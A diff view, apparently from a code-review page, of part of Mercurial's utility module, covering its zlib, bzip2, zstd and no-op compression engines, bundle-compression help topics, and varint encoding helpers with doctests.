3653 3659 def decompress(self, data):
3654 3660 try:
3655 3661 return zlib.decompress(data)
3656 3662 except zlib.error as e:
3657 3663 raise error.StorageError(_('revlog decompress error: %s') %
3658 3664 stringutil.forcebytestr(e))
3659 3665
3660 3666 def revlogcompressor(self, opts=None):
3661 3667 return self.zlibrevlogcompressor()
3662 3668
3663 3669 compengines.register(_zlibengine())
3664 3670
3665 3671 class _bz2engine(compressionengine):
3666 3672 def name(self):
3667 3673 return 'bz2'
3668 3674
3669 3675 def bundletype(self):
3670 3676 """An algorithm that produces smaller bundles than ``gzip``.
3671 3677
3672 3678 All Mercurial clients should support this format.
3673 3679
3674 3680 This engine will likely produce smaller bundles than ``gzip`` but
3675 3681 will be significantly slower, both during compression and
3676 3682 decompression.
3677 3683
3678 3684 If available, the ``zstd`` engine can yield similar or better
3679 3685 compression at much higher speeds.
3680 3686 """
3681 3687 return 'bzip2', 'BZ'
3682 3688
3683 3689 # We declare a protocol name but don't advertise by default because
3684 3690 # it is slow.
3685 3691 def wireprotosupport(self):
3686 3692 return compewireprotosupport('bzip2', 0, 0)
3687 3693
3688 3694 def compressstream(self, it, opts=None):
3689 3695 opts = opts or {}
3690 3696 z = bz2.BZ2Compressor(opts.get('level', 9))
3691 3697 for chunk in it:
3692 3698 data = z.compress(chunk)
3693 3699 if data:
3694 3700 yield data
3695 3701
3696 3702 yield z.flush()
3697 3703
3698 3704 def decompressorreader(self, fh):
3699 3705 return _BZ2CompressedStreamReader(fh)
3700 3706
3701 3707 compengines.register(_bz2engine())
3702 3708
3703 3709 class _truncatedbz2engine(compressionengine):
3704 3710 def name(self):
3705 3711 return 'bz2truncated'
3706 3712
3707 3713 def bundletype(self):
3708 3714 return None, '_truncatedBZ'
3709 3715
3710 3716 # We don't implement compressstream because it is hackily handled elsewhere.
3711 3717
3712 3718 def decompressorreader(self, fh):
3713 3719 return _TruncatedBZ2CompressedStreamReader(fh)
3714 3720
3715 3721 compengines.register(_truncatedbz2engine())
3716 3722
3717 3723 class _noopengine(compressionengine):
3718 3724 def name(self):
3719 3725 return 'none'
3720 3726
3721 3727 def bundletype(self):
3722 3728 """No compression is performed.
3723 3729
3724 3730 Use this compression engine to explicitly disable compression.
3725 3731 """
3726 3732 return 'none', 'UN'
3727 3733
3728 3734 # Clients always support uncompressed payloads. Servers don't because
3729 3735 # unless you are on a fast network, uncompressed payloads can easily
3730 3736 # saturate your network pipe.
3731 3737 def wireprotosupport(self):
3732 3738 return compewireprotosupport('none', 0, 10)
3733 3739
3734 3740 # We don't implement revlogheader because it is handled specially
3735 3741 # in the revlog class.
3736 3742
3737 3743 def compressstream(self, it, opts=None):
3738 3744 return it
3739 3745
3740 3746 def decompressorreader(self, fh):
3741 3747 return fh
3742 3748
3743 3749 class nooprevlogcompressor(object):
3744 3750 def compress(self, data):
3745 3751 return None
3746 3752
3747 3753 def revlogcompressor(self, opts=None):
3748 3754 return self.nooprevlogcompressor()
3749 3755
3750 3756 compengines.register(_noopengine())
3751 3757
3752 3758 class _zstdengine(compressionengine):
3753 3759 def name(self):
3754 3760 return 'zstd'
3755 3761
3756 3762 @propertycache
3757 3763 def _module(self):
3758 3764 # Not all installs have the zstd module available. So defer importing
3759 3765 # until first access.
3760 3766 try:
3761 3767 from . import zstd
3762 3768 # Force delayed import.
3763 3769 zstd.__version__
3764 3770 return zstd
3765 3771 except ImportError:
3766 3772 return None
3767 3773
3768 3774 def available(self):
3769 3775 return bool(self._module)
3770 3776
3771 3777 def bundletype(self):
3772 3778 """A modern compression algorithm that is fast and highly flexible.
3773 3779
3774 3780 Only supported by Mercurial 4.1 and newer clients.
3775 3781
3776 3782 With the default settings, zstd compression is both faster and yields
3777 3783 better compression than ``gzip``. It also frequently yields better
3778 3784 compression than ``bzip2`` while operating at much higher speeds.
3779 3785
3780 3786 If this engine is available and backwards compatibility is not a
3781 3787 concern, it is likely the best available engine.
3782 3788 """
3783 3789 return 'zstd', 'ZS'
3784 3790
3785 3791 def wireprotosupport(self):
3786 3792 return compewireprotosupport('zstd', 50, 50)
3787 3793
3788 3794 def revlogheader(self):
3789 3795 return '\x28'
3790 3796
3791 3797 def compressstream(self, it, opts=None):
3792 3798 opts = opts or {}
3793 3799 # zstd level 3 is almost always significantly faster than zlib
3794 3800 # while providing no worse compression. It strikes a good balance
3795 3801 # between speed and compression.
3796 3802 level = opts.get('level', 3)
3797 3803
3798 3804 zstd = self._module
3799 3805 z = zstd.ZstdCompressor(level=level).compressobj()
3800 3806 for chunk in it:
3801 3807 data = z.compress(chunk)
3802 3808 if data:
3803 3809 yield data
3804 3810
3805 3811 yield z.flush()
3806 3812
3807 3813 def decompressorreader(self, fh):
3808 3814 return _ZstdCompressedStreamReader(fh, self._module)
3809 3815
3810 3816 class zstdrevlogcompressor(object):
3811 3817 def __init__(self, zstd, level=3):
3812 3818 # TODO consider omitting frame magic to save 4 bytes.
3813 3819 # This writes content sizes into the frame header. That is
3814 3820 # extra storage. But it allows a correct size memory allocation
3815 3821 # to hold the result.
3816 3822 self._cctx = zstd.ZstdCompressor(level=level)
3817 3823 self._dctx = zstd.ZstdDecompressor()
3818 3824 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3819 3825 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3820 3826
3821 3827 def compress(self, data):
3822 3828 insize = len(data)
3823 3829 # Caller handles empty input case.
3824 3830 assert insize > 0
3825 3831
3826 3832 if insize < 50:
3827 3833 return None
3828 3834
3829 3835 elif insize <= 1000000:
3830 3836 compressed = self._cctx.compress(data)
3831 3837 if len(compressed) < insize:
3832 3838 return compressed
3833 3839 return None
3834 3840 else:
3835 3841 z = self._cctx.compressobj()
3836 3842 chunks = []
3837 3843 pos = 0
3838 3844 while pos < insize:
3839 3845 pos2 = pos + self._compinsize
3840 3846 chunk = z.compress(data[pos:pos2])
3841 3847 if chunk:
3842 3848 chunks.append(chunk)
3843 3849 pos = pos2
3844 3850 chunks.append(z.flush())
3845 3851
3846 3852 if sum(map(len, chunks)) < insize:
3847 3853 return ''.join(chunks)
3848 3854 return None
3849 3855
3850 3856 def decompress(self, data):
3851 3857 insize = len(data)
3852 3858
3853 3859 try:
3854 3860 # This was measured to be faster than other streaming
3855 3861 # decompressors.
3856 3862 dobj = self._dctx.decompressobj()
3857 3863 chunks = []
3858 3864 pos = 0
3859 3865 while pos < insize:
3860 3866 pos2 = pos + self._decompinsize
3861 3867 chunk = dobj.decompress(data[pos:pos2])
3862 3868 if chunk:
3863 3869 chunks.append(chunk)
3864 3870 pos = pos2
3865 3871 # Frame should be exhausted, so no finish() API.
3866 3872
3867 3873 return ''.join(chunks)
3868 3874 except Exception as e:
3869 3875 raise error.StorageError(_('revlog decompress error: %s') %
3870 3876 stringutil.forcebytestr(e))
3871 3877
3872 3878 def revlogcompressor(self, opts=None):
3873 3879 opts = opts or {}
3874 3880 return self.zstdrevlogcompressor(self._module,
3875 3881 level=opts.get('level', 3))
3876 3882
3877 3883 compengines.register(_zstdengine())
3878 3884
3879 3885 def bundlecompressiontopics():
3880 3886 """Obtains a list of available bundle compressions for use in help."""
3881 3887 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3882 3888 items = {}
3883 3889
3884 3890 # We need to format the docstring. So use a dummy object/type to hold it
3885 3891 # rather than mutating the original.
3886 3892 class docobject(object):
3887 3893 pass
3888 3894
3889 3895 for name in compengines:
3890 3896 engine = compengines[name]
3891 3897
3892 3898 if not engine.available():
3893 3899 continue
3894 3900
3895 3901 bt = engine.bundletype()
3896 3902 if not bt or not bt[0]:
3897 3903 continue
3898 3904
3899 3905 doc = b'``%s``\n %s' % (bt[0], pycompat.getdoc(engine.bundletype))
3900 3906
3901 3907 value = docobject()
3902 3908 value.__doc__ = pycompat.sysstr(doc)
3903 3909 value._origdoc = engine.bundletype.__doc__
3904 3910 value._origfunc = engine.bundletype
3905 3911
3906 3912 items[bt[0]] = value
3907 3913
3908 3914 return items
3909 3915
3910 3916 i18nfunctions = bundlecompressiontopics().values()
3911 3917
3912 3918 # convenient shortcut
3913 3919 dst = debugstacktrace
3914 3920
3915 3921 def safename(f, tag, ctx, others=None):
3916 3922 """
3917 3923 Generate a name that it is safe to rename f to in the given context.
3918 3924
3919 3925 f: filename to rename
3920 3926 tag: a string tag that will be included in the new name
3921 3927 ctx: a context, in which the new name must not exist
3922 3928 others: a set of other filenames that the new name must not be in
3923 3929
3924 3930 Returns a file name of the form oldname~tag[~number] which does not exist
3925 3931 in the provided context and is not in the set of other names.
3926 3932 """
3927 3933 if others is None:
3928 3934 others = set()
3929 3935
3930 3936 fn = '%s~%s' % (f, tag)
3931 3937 if fn not in ctx and fn not in others:
3932 3938 return fn
3933 3939 for n in itertools.count(1):
3934 3940 fn = '%s~%s~%s' % (f, tag, n)
3935 3941 if fn not in ctx and fn not in others:
3936 3942 return fn
3937 3943
3938 3944 def readexactly(stream, n):
3939 3945 '''read n bytes from stream.read and abort if less was available'''
3940 3946 s = stream.read(n)
3941 3947 if len(s) < n:
3942 3948 raise error.Abort(_("stream ended unexpectedly"
3943 3949 " (got %d bytes, expected %d)")
3944 3950 % (len(s), n))
3945 3951 return s
3946 3952
3947 3953 def uvarintencode(value):
3948 3954 """Encode an unsigned integer value to a varint.
3949 3955
3950 3956 A varint is a variable length integer of 1 or more bytes. Each byte
3951 3957 except the last has the most significant bit set. The lower 7 bits of
3952 3958 each byte store the 2's complement representation, least significant group
3953 3959 first.
3954 3960
3955 3961 >>> uvarintencode(0)
3956 3962 '\\x00'
3957 3963 >>> uvarintencode(1)
3958 3964 '\\x01'
3959 3965 >>> uvarintencode(127)
3960 3966 '\\x7f'
3961 3967 >>> uvarintencode(1337)
3962 3968 '\\xb9\\n'
3963 3969 >>> uvarintencode(65536)
3964 3970 '\\x80\\x80\\x04'
3965 3971 >>> uvarintencode(-1)
3966 3972 Traceback (most recent call last):
3967 3973 ...
3968 3974 ProgrammingError: negative value for uvarint: -1
3969 3975 """
3970 3976 if value < 0:
3971 3977 raise error.ProgrammingError('negative value for uvarint: %d'
3972 3978 % value)
3973 3979 bits = value & 0x7f
3974 3980 value >>= 7
3975 3981 bytes = []
3976 3982 while value:
3977 3983 bytes.append(pycompat.bytechr(0x80 | bits))
3978 3984 bits = value & 0x7f
3979 3985 value >>= 7
3980 3986 bytes.append(pycompat.bytechr(bits))
3981 3987
3982 3988 return ''.join(bytes)
3983 3989
3984 3990 def uvarintdecodestream(fh):
3985 3991 """Decode an unsigned variable length integer from a stream.
3986 3992
3987 3993 The passed argument is anything that has a ``.read(N)`` method.
3988 3994
3989 3995 >>> try:
3990 3996 ... from StringIO import StringIO as BytesIO
3991 3997 ... except ImportError:
3992 3998 ... from io import BytesIO
3993 3999 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3994 4000 0
3995 4001 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3996 4002 1
3997 4003 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3998 4004 127
3999 4005 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4000 4006 1337
4001 4007 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4002 4008 65536
4003 4009 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4004 4010 Traceback (most recent call last):
4005 4011 ...
4006 4012 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4007 4013 """
4008 4014 result = 0
4009 4015 shift = 0
4010 4016 while True:
4011 4017 byte = ord(readexactly(fh, 1))
4012 4018 result |= ((byte & 0x7f) << shift)
4013 4019 if not (byte & 0x80):
4014 4020 return result
4015 4021 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now